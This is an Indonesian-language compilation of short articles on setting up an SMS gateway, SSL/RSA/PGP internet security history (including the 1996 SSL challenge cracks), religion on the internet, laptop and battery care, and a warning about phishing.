cara membuat server sms

Dari segi peralatan cukup 1 buah PC dan 1 buah handphone + kabelnya. Ini kalau mau pakai handphone. Cuma, kalau dengan handphone ini biasanya cuma bisa mengirimkan 1 sms itu sekitar 8 detik.Atau kalau mau yang sedikit lebih bagus bisa gantikan handphone nya dengan GSM Modem. Ini nantinya SIM Card nya akan ditancapkan di GSM Modem itu. GSM Modem ini bisa mengirimkan 1 sms sekitar 3.6 sampai 4 detik atau kurang lebih bisa mengirimkan 1000 sms dalam waktu 1 jam.Kalau dari segi software sms gateway nya bisa menggunakan gnokii, kannel, atau sms server tool.Kalau mau coba interface web untuk mengirimkan sms nya bisa coba playsms buatan Anton Raharja. Bisa di download di source forge.
software utk sms gateway salah satunya http://playsms.sourceforge.netitu yang buat orang Indonesia, anton raharja (anton@ngoprek.org)
Sekedar menambahkan agar sms bisa di terima/kirim tentunya harus ada program/daemon yang akan selalu memonitor sms di device (hp/gsm modem). nah si gnokii, kannel, atau sms server tool ini nantinya akan jadi daemon tersebut.agar bisa mudah menulis sms, melihat sms yang masuk, dan mengatur sms yang ada mau digimanain tanpa kita menyentuh hp/gsm modem kan harus ada software nya toh. nah di sini lah playsms buatan anton raharja berperan. kalau mau buat aja sendiri seperti kita bikin aplikasi web biasa. toh nantinya sms yang ada di hp/modem bisa ditarik ke database (mysql/postgresql) atau ke file.

Usaha Mengamankan Internet bagi Dunia Usaha

Internet sebagai jaringan data public sangat diragukan keamanannya untuk transaksi dagang / bisnis. Bagaimana usaha yang dilakukan untuk menjamin keamanan data yang dikirimkan melalui jaringan public Internet akan dicoba diterangkan pada kesempatan ini. Bentuk tulisan ini akan mendasarkan dirinya untuk menjawab beberapa pertanyaan yang sering muncul. Beberapa cerita tambahan tentang ketahanan sistem security RSA juga akan dicoba dikembangkan & mungkin dapat menjadi masukan sejauh mana ketahanan sistem ini. Informasi tentang security sebetulnya cukup mudah di peroleh di Internet seperti di http://www.netscape.com, http://www.rsa.com atau melalui berbagai search engine di Internet menggunakan keyword yang berkaitan dengan network security. Web sebagai media aplikasi untuk dunia bisnis di Internet merupakan tool yang paling menarik karena kemampuan multimedia & interaktifnya. Perkembangan yang pesat dari Web server ternyata cukup pesat, hal ini dapat kita lihat dengan jelas dari grafik pertumbuhan Web server di Internet yang di publikasikan oleh WebCrawler salah satu search engine yang besar di Internet. Berbagai pertanyaan yang seringkali muncul ke permukaan pada saat kita dihadapkan pada kenyataan untuk melakukan bisnis di Internet melalui Netscape Navigator atau Micro$oft Explorer antara lain adalah: Mengapa perlu security features? Apa saja resiko minimal yang harus di tanggung oleh pengguna Internet? Bagaimana caranya teknologi security mengamankan browser dari resiko ini? Sampai sejauh mana security feature yang ada di browser dapat membantu kita bertahan terhadap resiko yang ada? Bagaimana caranya kita dapat melihat level security dari dokumen yang saat ini kita lihat. Bagaimana caranya kita mengetahui bahwa Navigator yang kita gunakan sedang beroperasi pada encrypted mode? Apakah dibutuhkan semacam metoda sertifikasi / authentikasi untuk menggunakan Internet secara aman? Apakah mungkin / cukup aman mengirimkan informasi personal melalui Internet, seperti nomor kartu kredit? Apakah dengan mengaktifkan security features maka kita akan menambahkan limitasi untuk mengakses berbagai site di Internet? Baiklah mari kita lihat jawaban dari masing-masing pertanyaan yang seringkali muncul satu per satu.
Mengapa perlu security features? Security merupakan prasyarat dasar karena pada dasarnya Internet adalah sebuah jaringan yang tidak aman. Jutaan komputer membentuk public network Internet dimana komunikasi dapat di dengarkan di tengah jalan. Pada saat data bergerak dari pengirim ke penerima, pasti melalui beberapa koneksi (router dll) sebelum mencapai tujuan akhirnya. Artinya komputer lain di luar dua komputer yang saling berkomunikasi tersebut sangat mungkin untuk akses data tersebut. Oleh karenanya, security merupakan prasyarat mutlak jika kita ingin data kita selamat melalui jaringan publik tersebut. Resiko apa saja yang harus di tanggung oleh pengguna Internet? Pada dasarnya pada saat data dikirim melalui Internet akan terbuka pada tiga (3) macam resiko keamanan, yaitu: Eavesdropping - komputer antara mendengarkan pembicaraan dari dua komputer yang sedang berbicara secara private. Manipulation - komputer antara akan mengganti informasi dalam data yang dikirimkan. Impersonation - sebuah komputer akan berpura-pura menjadi komputer lain (misalnya menjadi komputer tempat melakukan transaksi dagang). Sebetulnya situasi ini sama persis dengan kondisi kita pada saat melakukan pembelian mail order melalui telepon. Ketiga resiko di atas akan terjadi pada saat melakukan transaksi mail order.
Bagaimana caranya teknologi security mengamankan browser dari resiko ini? Pada saat ini ada banyak sekali pengembangan perangkat keamanan komputer maupun yang dapat dijalankan di jaringan komputer. Salah satu yang cukup pesat berkembang antara lain adalah Secure Socket Layer (SSL) yang dikembangkan oleh Netscape. SSL pada dasarnya sebuah set aturan yang memberitahukan step yang harus dilalui untuk meningkatkan tingkat keamanan komunikasi. Aturan SSL ini di disain untuk melakukan: Encryption, untuk mengatasi eavesdropping Data integrity, untuk mengatasi manipulation Authentication, untuk mengatasi impersonation Perlu dipahami bahwa SSL hanya akan memproteksi data kita pada saat transmisi saja. Hal ini yang disebut network security. Protokol SSL sama sekali tidak akan memproteksi data - sebelum maupun sesudah dilakukan komunikasi. Artinya kita harus percaya penuh bahwa penjual / merchant tidak memberikan nomor kartu kredit yang kita miliki ke orang lain.
Sampai sejauh mana security feature yang ada di browser dapat membantu kita bertahan terhadap resiko yang ada? Internet pada dasarnya adalah jaringan yang tidak aman. Sebetulnya tidak ada teknik security di dunia ini yang berani mengklaim sebagai teknik yang tidak bisa di tembus / paling aman. Untuk itu perlu digiatkan para pengguna Internet untuk menjamin keamanannya untuk melakukan beberapa hal di bawah ini: Selalu menggunakan versi terakhir dari software yang digunakan. Umumnya vendor software akan mengeluarkan versi terbaru untuk memperbaiki berbagai lubang security / bug yang ada. Sedapat mungkin gunakan versi security tertinggi. Saat ini pengguna Netscape di US & Canada dapat menggunakan software Netscape yang mempunyai 128-bit key yang akan memberikan keamanan jauh lebih tinggi daripada 40-bit key yang saat ini boleh di export keluar US. Regulasi di US sedang diperjuangkan untuk di ubah untuk memungkinkan penggunaan jumlah bit key yang tinggi. Cara setting system security?
Pada dasarnya sebuah sistem security akan terbagi dalam dua hal besar, yaitu: Cipher suite adalah algoritma kryptografi yang digunakan untuk sebuah komunikasi; umumnya digunakan beberapa algoritma sekaligus. SSL menggunakan sebuah algoritma untuk verifikasi identitas, sebuah untuk enkripsi data yang di transaksikan, dan sebuah algoritma lagi untuk message integrity. Sertifikasi digunakan untuk binding sebuah (client atau server) ke public key. Sebuah sertifikatpada dasarnya sebuah data file dengan beberapa buah informasi di dalamnya. Informasi ini berisi: "Nama" yang menjelaskan pemegang sertifikat. Public key dari pemegang sertifikat. Autoritas sertifikat tersebut, yang akan memberikan informasi seperti, serial number, expiration date, dan sidik jari digital. Bagaimana caranya kita mengetahui browse yang kita operasikan sedang dalam keadaan aman?
Jika kita menggunakan Netscape maka di URL yang dituju haruslah https:// bukan http:// jadi ada huruf "s" sesudah http. Di samping itu di pojok kiri bawah, gambar kunci tersambung - tidak terpisah seperti pada saat operasi biasa dilakukan. Apakah sertifikasi diperlukan untuk menggunakan Internet secara aman? Sertikat diperlukan oleh minimal salah satu unit / komputer yang berkomunikasi menggunakan SSL. Sejak tahun 1996, umumnya sertifikasi dilakukan oleh server, yang akan mengautentikasi identitas & menerima informasi dari pengunjung yang datang ke site mereka dalam lingkungan komunikasi yang terproteksi. Pola ini banyak digunakan oleh berbagai sites yang menjual barang di Internet. Saat ini semakin banyak user individual yang mempunyai personal sertifikasi terutama untuk mengirimkan mail secara aman maupun untuk keperluan autentikasi. Bagaimana dengan pengiriman informasi yang sifatnya pribadi seperti nomor kartu kredit? Kita dapat mengirimkan nomor kartu kredit jika pada saat itu security diaktifkan di brwoser (https) maupun di server. Dengan menggunakan jalur komunikasi yang telah diaktifkan security-nya maka akan dikurangi resiko fraud dll pada saat informasi di transmisikan melalui Internet. Satu hal yang harus kita jaga adalah kita harus percaya penuh pada penerima informasi finansial tersebut. Teknologi security hanya akan mengamankan jalur komunikasi akan tetapi tidak akan mengamanan kita pada orang-orang yang sembrono di balik server sana. Apakah security features akan membatasi kemungkinan bagi kita mengakses site Internet? Sama sekali tidak, bahkan kita masih tetap bisa menerima mail & news baik yang di encrypt maupun tidak secara transparan. Mudah-mudahan sedikit jawaban dari Frequently Asked Questions (FAQ) di atas akan memberikan sedikit gambaran tentang usaha yang sedang berlangsung untuk mengamankan Internet bagi dunia usaha. Selanjutnya akan kita perdalam lebih lanjut beberapa hal yang berkaitan dengan pengembangan protokol security itu sendiri. Usaha pengembangan protocol security sejalan dengan berbagai usaha untuk men-challenge / membobol protocol tersebut yang merupakan sayembara Internasional.
Secure Socket Layer Netscape telah merancang & menspesifikasikan protokol untuk menjamin security data antara protocol layer aplikasi (seperti HTTP, Telnet, NNTP atau FTP) dengan TCP/IP. Protokol security itu di sebut, Secure Socket Layer (SSL), yang memberikan enkripsi data, autentikasi server, message integrity dan option untuk autentikasi client pada saat hubungan TCP/IP berlangsung. SSL pada dasarnya sebuah protocol yang non-proprietary & open. MD5 dan RC4, dua dari komponen kriptografi (yang sangat baik) dari SSL, di disain oleh Ron Rivest dari RSA Laboratories http://www.rsa.com. SSL sudah dimasukan ke W3 Consortium (W3C) working group on security untuk dilihat kemungkinannya sebagai standard security pada World Wide Web browser & server di Internet. Versi terakhir dari protocol SSL sudah dimasukan ke Internet Engineering Task Force (IETF) http://www.ietf.org dan tersedia di Internet sebagai Internet Draft. Kita bahkan dapat dengan mudah berpartisipasi dalam pengembangan protocol ini dengan cara subscribe ke mailing list IETF untuk keperluan tersebut. Caranya: kirim mail ke ietf-tls-request@w3.org. pada subject tulis "subscribe" Selain itu juga mailing list ssl-talk@netscape.com. yang dapat di subscribe melalui cara: kirim mail ke ssl-talk-request@netscape.com. pada subject tulis "subscribe" Untuk mempelajari lebih lanjut dari SSL dapat diperoleh dengan mendatangi site-site berikut: http://home.netscape.com/eng/ssl3/index.html - yang menerangkan secara detail dari Secure Socket Layer versi 3. http://home.netscape.com/info/security-doc.html - dokumentasi dari Netscape tentang aspek security. http://home.netscape.com/assist/security/ssl/protocol.html - Secure Socket Layer. http://home.netscape.com/assist/security/ssl/howitworks.html - bagaimana SSL bekerja. http://www.consensus.com/security/ssl-talk-faq.html - Frequently Asked Questions (FAQ) tentang SSL.
RSA RSA yang bermarkas di Redwood City, California http://www.rsa.com merupakan salah satu lembaga penelitian bidang security yang cukup besar khususnya dalam bidang enkripsi data. Public key RSA merupakan salah satu algoritma yang digunakan oleh SSL Netscape. Saat ini RSA Lab sedang mengembangkan yang disebut sebagai: Public-Key Cryptographics Standards (PKCS) yang dikembangkan sejak tahun 1991 bersama Apple, Digital, Lotus, Microsoft, MIT, Northern Telecom, Novell dan Sun. Standard yng dikembangkan meliputi beberapa hal seperti RSA encryption, Diffie-Hellman key agreement, password-based encryption, extended-certificate syntax, cryptographic message syntax, private-key information syntax, dan certification request syntax. Detail artikel tentang berbagai standard ini dapat dengan mudah di ambil dari Homepage RSA di http://www.rsa.com/. Untuk melakukan diseminasi informasi maupun interaksi dengan para ahli / penggemar dunia kriptograpfi beberapa mailing list telah dibuat oleh RSA yang diatur melalui majordomo@rsa.com.. Adapun mailing list tersebut adalah: pkcs-tng@rsa.com. - PKCS The Next Generation. cryptoki@rsa.com. - Cryptographic Token Interface Standard. pica@rsa.com. - Platform-Independent Cryptography API. Pretty Good Privacy (PGP) PGP merupakan salah satu protocol untuk security yang banyak digunakan di Internet selain SSL. Sebetulnya PGP jauh lebih sulit di bobol daripada SSL. Hal ini disebabkan panjang dari key yang digunakan di PGP jauh lebih panjang dari SSL sehingga pembobolan secara paksa sangat sulit dilakukan, meskipun dengan beberapa juta komputer secara parallel. Diskusi tentang hal ini banyak dilakukan di newsgroup sci.crypt dan alt.security.pgp - tampaknya konsensus yang ada menunjukan bahwa PGP - Pretty Good.
Sekedar gambaran untuk membobol PGP dengan 1024-bit key PGP message akan membutuhkan sekitar 300,000,000,000 MIPS year. Jadi sebetulnya dibutuhkan banyak waktu & uang untuk melakukan penjebolan itu. Untuk melihat detail dari penyerangan ke PGP dapat dilihat pada FAQ yang berlokasi di http://axion.physics.ubc.ca/pgp-attack.html. Software PGP versi Internasional yang di koordinir oleh St?le Schumacher stale@hypnotech.com. dapat diperoleh dengan mudah dari Internet pada alamat: http://www.ifi.uio.no/pgp/download.shtml ftp://ftp.ifi.uio.no/pub/pgp/ ftp://ftp.encomix.es/pub/pgp/ ftp://ftp.ox.ac.uk/pub/crypto/pgp/ Atau melalui E-mail dengan mengirimkan mail ke pgp@hypnotech.com. dengan perintah GET PGP di Subject. Tempat untuk mencari lebih lanjut berbagai informasi tentang PGP dapat dilakukan melalui Internet: http://www.ifi.uio.no/pgp/ http://www.prairienet.org/~jalicqui/pgpfaq.txt ftp://ftp.uu.net/usenet/news.answers/pgp-faq/where-is-PGP.Z http://world.std.com/~franl/pgp/pgp-passphrase-faq.html http://axion.physics.ubc.ca/pgp-attack.html ftp://net-dist.mit.edu/pub/PGP/PGP_FAQ http://world.std.com/~franl/pgp/pgp.html http://www.mit.edu:8001/people/warlord/pgp-faq.html
Usaha Pembobolan Sistem Security. Seperti kita ketahui bersama bahwa tidak ada satupun sistem di dunia ini yang sempurna. Oleh karena itu, usaha untuk membobol sistem security yang dikembangkan bahkan akhir-akhir ini di sayembarakan di Internet untuk menguji sampai sejauh mana tingkat kesulitan untuk menembus sistem security tersebut. Hasil dari usaha pembobolan tersebut biasanya menjadi umpan balik bagi para perancang protocol security untuk kemudian diperbaiki. Ada baiknya penulisan dilakukan secara kronologis. 14 Juli 1996: Hal Finney melakukan posting dari SSL challenge: sebuah record dari "secure" Netscape sesion yang di enkrip menggunakan algoritma RC4-128-EXPORT-40. 15 Agustus 1996: Dua kelompok berhasil memecahkan SSL challenge tersebut. Kelompok yang pertama adalah David Byers davby@ida.liu.se. dan Eric Young eay@mincom.oz.au,. bekerjasama dengan Adam Back aba@dcs.ex.ac.uk. berhasil memecahkannya pada pukul 10:43. Dua jam kemudian, Damien Doligez Damien.Doligez@inria.fr. berhasil memecahkan pada pukul 12:23. Menarik untuk dilihat lamanya waktu untuk menguasai ilmu untuk memecahkan challenge tersebut dibutuhkan waktu hampir bulan. Menurut Damien, untuk memecahkan SSL dengan 40-bit key dibutuhkan sekitar 40 buah high end Pentium PC yang di kaitkan dalam sebuah jaringan komputer sehingga dapat dipecahkan secara parallel untuk memperkuat kemampuan komputasinya. Perlu diketahui bahwa Damien menggunakan sekitar 120 komputer secara parallel untuk memecahkannya. Waktu yang dibutuhkan untuk memecahkan challenge tersebut dengan kekuatan 120 komputer adalah sekitar 8 hari (estimasi maksimum akan dibutuhkan waktu 15 hari). 17 Agustus 1996: Netscape mengirimkan responds resmi mereka. Walaupun sebagian besar orang kurang setuju (karena underestimate) dengan angka US$10,000 untuk biaya pembobolan algoritma RC4-128 di SSL mereka. Sejak saat ini mulai ada usaha-usaha dari para cyberpunk untuk bersatu & membentuk sebuah jaringan "key cracking ring" untuk melihat seberapa cepat kita kita dapat membongkar sesion yang di enkrip dengan menggunakan banyak mesin di Internet secara parallel dari ring tersebut. 19 August 1996: Hal Finney kembali melakukan posting dari SSL challenge yang kedua kepada para cyberpunk untuk "key cracking ring". Kegiatan ini di koordinir oleh Adam Back dan Piete Brooks. 24 Agustus 1996: "Key cracking ring" yang merupakan kumpulan komputer yang bekerja secara parallel melalui jaringan Internet mulai bekerja pada challenge tanggal 19 Agustus yang dilakukan pada pukul 18:00 GMT. Dalam waktu kurang dari 32 jam hasilnya diperoleh! 17 September 1996: Ian Goldberg dan David Wagner berhasil membobol pseudo-random number generator dari Netscape Navigator 1.1. Mereka berhasil masuk ke session key dalam waktu beberapa jam dari sebuah workstation. Seperti kita lihat di atas bahwa untuk memecahkan sebuah secure session SSL dengan 40-bit key ternyata membutuhkan waktu yang lama (berhari-hari) dengan kekuatan 120 komputer melakukan komputasi secara parallel. Hal ini menunjukan betapa sulitnya untuk memecahkan sebuah secure session. Dengan adanya usaha Netscape untuk mengexport versi SSL yang lebih aman dengan 128-bit key maka akan semakin sulit untuk menembus proteksi yang akan ada.
Summary Pada dasarnya berbagai algoritma security yang dikembangkan untuk mengamankan transmisi data melalui jaringan komputer public Internet sebetulnya mampu untuk mengamankan saluran transmisi sehingga cukup aman. Untuk membobol sebuah session yang telah di amankan, dibutuhkan banyak waktu & komputer yang bekerja secara parallel. Kita semua berharap agar pemerintah Amerika Serikat akan melunakan peraturan export mereka supaya program security yang kuat dapat di export dengan mudah ke luar Amerika Serikat & akhirny akan meningkatkan keamanan transmisi data melalui Internet sehingga akan menambah semangat dunia usaha untuk berusaha di Internet. Sekedar tambahan berbagai Newsgroup di Internet yang membahas tentang berbagai hal yang berkaitan dengan security antara lain adalah: alt.anonymous alt.anonymous.messages alt.privacy.clipper alt.security alt.security.pgp alt.security.ripem alt.security.keydist alt.society.civil-liberty comp.compression comp.org.eff.news comp.org.eff.talk comp.patents comp.risks comp.society.privacy comp.security.announce misc.legal.computing sci.crypt sci.math talk.politics.crypto Mudah-mudahan tulisan yang cukup panjang ini dapat memberikan gambaran secara garis besar tentang usaha yang sedang berjalan untuk mengamankan Internet bagi dunia usaha. Juga diharapkan dapat menjadi acuan awal bagi rekan-rekan yang ingin mendalami lebih lanjut masalah keamanan / security di Internet.

Tuhan (di) Internet

Bila Anda melacak (searching) kata seperti religion, faith atau spirituality di Internet, maka Anda akan mendapatkan data berlimpah overwhelmed). Hal itu menurut berita ABC ABCNews.com 13/6/2000) yang berjudul "Net Religion", disebabkan karena pada bulan-bulan belakangan ini telah terjadi ledakan secara eksponensial situs web - situs web baruyang berkiprah pada tema-tema dan segala tetek bengek yang berkaitan dengan persoalan spiritual. Mulai dari homepage yang bernama "wuzupgod.com" sebuah situs web yang memasang pesan-pesan spiritual provokatif, "hollywoodjesus.com", situs yang menayangkan pernik-pernik spiritual pada film-film yang masuk kategori box office, hingga "islamcity.com", sebuah situs yang menawarkan kepada pengunjung muslim untuk melakukan haji ke Mekah secara virtual. Pengakses Internet juga bisa menjumpai tempat untuk melakukan meditasi secara online di halaman Budhist pada situs beliefnet.com. Adalagi situs-situs lain yang juga memberi aneka service dan sajian spiritualitas, semisal "webod.com", "god.org", "faith.com", "spirichannel.com", "Ibelieve.com", religiousmovements.org" dan sejenisnya. Beragam situs, mulai dari yang sangat sederhana hingga yang telah mengalami elaborasi dengan amat canggih, itulah yang menyebabkan seseorang yan mencoba melacak hal-hal berbau mistik akan "kebanjiran" dan kewalahan. Mengapa hingar-bingar spiritualitas menemukan ruan terasyiknya pada teknologi mutakhir yang bernama Internet? "People see the Net as a new metaphor for God", kata Sherry Turkel, professor Sociology of Science pada Massachusetts Institue of Technology (MIT). Internet menurut sebagian orang merupakan metafor baru bagi Tuhan. Mungkin kita bertanya, "Apa maksud istilah tuhan dalam konteks ini?" Bila makna kata Tuhan pada perbincangan ini adalah sebagaimana yang umum dipahami orang, maka dalam hal apa metafor itu terjadi. Internet seakan-akan merupakan dunia tersendiri yang berbeda dengan realitas dunia ini. Apa pun yang bisa ditemukan di dunia nyata, bisa juga ditemukan di Internet. Segala hal yang dicari dan diminta penduduk Bumi ini, seluruhnya dapat dijumpai di Internet. Internet, layaknya sesosok Tuhan, "bisa" mengabulkan "doa", mampu "melaknat" dan "menghukum" pendosa. William Gibson, penulis fiksi-ilmiah, mengatakan, "It may regard itself as God. And it may be God on its own terms." Gibson yang merupakan tokoh pencipta istilah "cyberspace" serta mempopulerkannya, terutama yang paling terkenal, pada novelnya yang terbit tahun 1984 berjudul "Neuromancer", seakan0akan hendak menyatakan, Internet bisa memandang dirinya sendiri sebagai sesosok tuhan. Dan dalam kosakata yang berkaitan dengan persoalan Internet, kata itu sendiri merupakan Tuhan. (Time, Vol 149 No. 1) Bila konsepsi, Internet merupakan metafor Tuhan dapat diterima, maka termasuk dalam lingkup peran "ketuhanan" Internet adalah memberi berbagai pelayanan yan berkaitan dengan hajat rohaniah atau batin manusia. Dalam fungsi ini, Bob Jacobson, pimpinan "Bluefire Consulting", sebuah penyelenggara jasa konsultasi Internet di Redwood City California menyatakan, Internet merupakan "restoran" terbesar yang menyediakan beragam menu bagi orang-orang yang mengalami kehausan spiritual. Ia menjadi wahana utama untuk menampilkan ekspresi mistik anak cucu Adam. "Religion is a big part of the Internet industry", tegas jacobson seperti dilansir CNN (20/1/2000). Ada beberapa alasan mengapa Internet menjadi jalan yang banyak dipilih para pencari dan penjelajah jejak-jejak spiritual. Pertama, jadwal kunjungan di berbagai rumah ibadah sering dibatasi waktu dan jumlah antrean jama'ah yang berkunjung. Guru, imam, pendeta atau pemimpin spiritual memiliki ruang dan kesempatan terbatas untuk bisa diajakberdialo, konsultasi atau memberi ceramah. Eksisitensi Internet yang melampaui natur duniawi (seperti waktu dan ruang) memberi keleluasan kepada penggunanya untuk mengakses dalam kondisi dan situasi apa pun. Singkatnya, situs-situs spiritualitas "never turns off" dan memiliki "unlimited access". Ia tidak pernah absen sedetik pun dan selalu bisa dikontak kapan saja. Kedua, banyak kelompok masyarakat yang merasa terbelenggu untuk mengekspresikan fantasi religius dan pengalaman spiritualnya. Salah satunya adalah para saintis. Dalam tradisi ilmiah, sebuah pendapat atau pengalaman atau tesis baru diakui kebenarannya bila memenuhi standar "clearly and distincly", dapat diverifikasi, dan lulus pada berbagai perangkat pengujian keilmiahan lainnya. Pengalaman spiritual tidak memenuhi standar-standar ilmiah itu. Ia ada di luar kategori penilaian sains. Karena itu, wajar bila ada saintis yang mengungkapkan ekstase rohani atau pengalaman mistik, mereka akan mendapat bioket dan pengasingan dari kawan-kawan satu profesi. Nah, Internet memberi ruang bagi aintis untuk memperbincangkan berbagai pengalaman aneh dan eksotis yang pernah didapatkan. Merekabisa berdialog dengan kawan satu profesi yan memiliki pengalaman mistik serupa di berbagai belahan dunia. TASTE (The Archives of Scientists' Transcendent Experiences) yang beralamat di www.issc-taste.org, misalnya merupakan situs web yang mencoba membangun forum bagi para saintis untuk saling bertukar pengalaman sspiritual dan mencurahkan "impian transendental".Sebuah wahana yang terasa masih sulit terwujud di pentas off line. Ketiga, orang-orang yang canggung atau sulit di rumah ibadah guna melakukan perbedaan teologis atau mendapatkan bimbingan rohani. Internet merupakan alternatif utama. Di Internet tidak ada yang perlu ditakuti, dikeramatkn atau disucikan. Secara fisik, tidak ada golongan yang disebut minoritas atau mayoritas. Bagi orang yang skeptis terhadap agama dan spiritualitas, misalnya Internet adalah wahana paling pas dan bebas bagi mereka untuk melakukan perdebatan seputar keragu-raguan yang ada di pikiran. Hampir senasib dengan kelompok skeptis adalah kalangan gay dan lesbian. Ada sebuah rumah ibadah online di Dallas yan mencatat sukses luar biasa dalam menyelenggarakan online service. Tercatat ada 3000 kaum gay dan lesbian yang telah menjadi jemaah rutin virutalnya. Michael Plazza, pastor di gereja itu mengatakan, Internet service membuatnya mampu merengkuh kaum lesbian dan gay di seantero dunia. SAtu kelompok manusia yang merasa tidak nyaman untuk hadir secara ragawi pada berbagai kebaktian di gereja. Jelas, lifestye model "umat Nabi Luth" itu perlu diperdebatkan keabsahannya. Namun bukankah kita etuju, adanya lifestyle itu tidak berarti hak mereka untuk menyalurkan hasrat spiritual lantas ditutup. Oleh karena adanya konsepsi, Internet merupakan metafor Tuan, orang seperti William Grassie, professor bidang agama di Temple University, menyatakan "Bila Tuhan (konsepsi mengenal Tuhan) tidak berubah, maka kita ada dalam kondisi bahaya, yaitu akan kehilangan Tuhan." (Time, Vol 149 No. 1) Terakhir ada ambivalensi terhadap peran "ketuhanan" internet. Di satu sisi ia bisa merupakan salah satu jalan menuju Tuhan. Tetapi di sisi lain pernyataan, Internet adalah metafor Tuhan terdengar seakan-akan mereduksi Tuhan itu sendiri. Karena itu terlepas kita setuju atau tidak terhadap pernyataan bahwa Internet merupakan metafor Tuhan, seperti perlu menengok sebuah pernyataan yang disampaikan sufi kesohor, Ibnu Al-Arabi, "Barangsiapa mengaku ia tau Allah bergaul dengan dirinya, dan ia tidak lari (dari pengakuan itu), maka itu tanda ia tidak tahu apa-apa, tidak ada yang tahu Allah, kecuali Allah sendiri, maka waspadalah, sebab yang sadar di antara kamu tentu tidak seperti yang alpa..."
Seperti barang electronic lainnya, laptop atau notebook juga memerlukan perawatan yang intensif agar tahan lama. Perwatan itu tidak hanya secara fisik, tapi juga meliputi program-program dalam laptop. Nah panduan berikut bisa anda terapkan.

Pembersihan
Sebelum membersihkan laptop, baca dulu petunjuk pemakaian laptop anda. Biasanya disitu ada cara-cara yang dianjurkan untuk membersihkan. Pembersihan umumnya dilakukan setahun sekali. Tapi jika anda sering membawa laptop bepergian, bersihkan lebih sering.
• Bagian luar
Gunakan kain katun yang lembut untuk membersihkan bagian luar laptop. Gunakan cairan pembersih computer yang dianjurkan. Anda bisa memperolehnya ditoko computer. Tapi jika tidak sempat ketoko, anda bisa membuatnya. Caranya : campur satu bagian alcohol dengan satu bagian air, aduk rata. Semprotkan cairan pembersih pada lap, jangan langsung ke laptop. Usapkan lap perlahan sehingga debu dan kotoran yang melekat hilang. Bersihkan hingga kebagian yang tersembunyi, seperti lubang skrup.
• Layar Bersihkan layar hanya ketika laptop mati. Sebab, dalam keadaan layar gelap itulah kotoran terlihat jelas. Disamping itu untuk menghindari kerusakan. Gunakan kain lembut seperti katun untuk membersihkannya. Jangan handuk, serbet atau kain lain yang dapat meninggalkan serabut dan goresan. Jangan menggunakan cairan ammonia untuk membersihkan layar, karena bisa memburamkan tampilan layar. Gunakan cairan khusus pembersih computer. semprotkan cairan itu pada lap, lantas usapkan kebagian yang hendak dibersihkan. Usap searah dari kiri kekanan atau dari atas ke bawah.
• Keyboard Agar keyboard tidak cepat kotor, usahakan untuk tidak makan atau minum saat mengetik. Sebaiknya anda membersihkan keyboard saat laptop dalam keadaan mati. Jika tidak atur agar tombol-tombol tidak berfungasi. Gunakan kain lembut yang sudah dibasahi cairan pembersih untuk mebersihkannya. Kemudian ulangi dengan mengusapkan kain kering. Sesekali gunakan vacuum cleaner kecil untuk menyedot kotoran.

PERAWATAN PROGRAM Perawatan program hendaknya dilakukan seminggu atau sebulan sekali. Tujuannya, agar data tidak rusak atau hilang. Selain itu agar anda tidak berhadapan dengan masalah program dalam perjalanan.
• “Bersihkan” Hard Drive Ketika anda menjalankan program yang meningalkan file temporary, Hard drive pasti menerima file yang tidak diperlukan. Nah, bersihkan Hard drive dari file-file itu satu bulan sekali, agar laptop bisa bekerja lebih baik. Dianjurkan menggunakan program-program disc clean up yang sudah tersedia.
• Pasang Antivirus Install software antivirus di laptop Anda. Dan selalu perbarui data definisi virus untuk mengantisipasi virus terbaru. Jangan lupa, perbaharui pula software lainnya. Dengan demikian data dalam laptop Anda akan aman. Terutama saat laptop dibawa bepergian.
• Back Up Data Anda perlu punya back up data atau cadangan data, agar tidak kehilangan data penting dalam laptop. Anda bisa menyimpannya dalam flash disk atau mobile disk.
• Defrag Sebulan sekali lakukan defrag terhadap hard disk. Tujuannya untuk menyusun kembali posisi file-file yang terpencar, sehingga mempercepat system dalam mencari file.

Beberapa Tips Merawat Battery Notebook

- Jangan gunakan baterai dan charger notebook yang tidak kompatibel. Jika tidak yakin dengan kompatibilitas baterai pengganti ataupun charger yang digunakan, hubungi bagian layanan dari produsen notebook terkait.
- Baterai notebook dapat menjadi panas dalam pemakaian normal sekalipun. Jangan gunakan notebook sambil diletakkan di pangkuan Anda.
- Ketika menggunakan notebook, hindari meletakkan notebook pada permukaan yang lunak / lembut, semisal pada sofa, tempat tidur atau karpet. Sebab permukaan seperti itu akan menghambat aliran udara di bagian bawah notebook dan dapat menimbulkan overheating
- Cegah terjadinya kontak pada dudukan baterai yang longgar dengan berbagai jenis obyek terbuat dari metal, seperti penjepit kertas, koin tipis, dan sebagainya.
- Baterai notebook, termasuk notebook itu sendiri tentunya, jangan sampai terjadi tekanan yang berlebihan yang diakibatkan karena terjatuh, terbentur, terhimpit ataupun tertumpuk oleh benda berat di atasnya. Hal tersebut akan mengakibatkan sirkuit di dalam baterai menjadi rentan terjadi hubungan arus pendek (korslet) yang kemudian mengakibatkan overheating.
- Jangan letakkan notebook di area yang dapat menjadi sangat panas, semisal di bawah terik matahari ataupun di dalam mobil yang diparkir cukup lama di tempat terbuka saat siang hari.
- Menjadi basah atau terkena air, adalah hal yang harus dihindari dari notebook ataupun baterainya. Meskipun nantinya akan mengering dan dapat berfungsi normal, sirkuit di dalam notebook ataupun baterai secara perlahan akan berkarat dan membuat rentan keselamatan penggunanya.
- Pastikan Anda memahami cara menggunakan, menyimpan dan men-charge baterai dan notebook yang telah tertulis di dalam buku manual.

HATI-HATI!! Jangan Terpancing Kejahatan "Phising"

Jika anda pemilik kartu kredit, waspadailah kejahatan ”phising” atau upaya memperoleh informasi pribadi seperti identitas pribadi (”user ID”), ”personal identification number” (PIN), dan nomor rekening bank atau nomor kartu kredit secara tak sah untuk transaksi ilegal. Jika lengah, Anda bisa menjadi target empuk tindak kriminal tersebut.Banyak akal yang digunakan pelaku phising untuk mengelabui korban. Salah satu trik tipu daya itu dengan menggunakan telepon untuk menghubungi korban. Dengan tutur kata yang lembut, suara halus dan sopan, korban bisa dengan mudah dijebak untuk membocorkan informasi personalnya.Awalnya Anda tak merasa diperdaya. Apalagi kalau orang itu menyampaikan kabar gembira, seperti Anda sebagai pemegang kartu kredit tertentu mendapat hadiah.
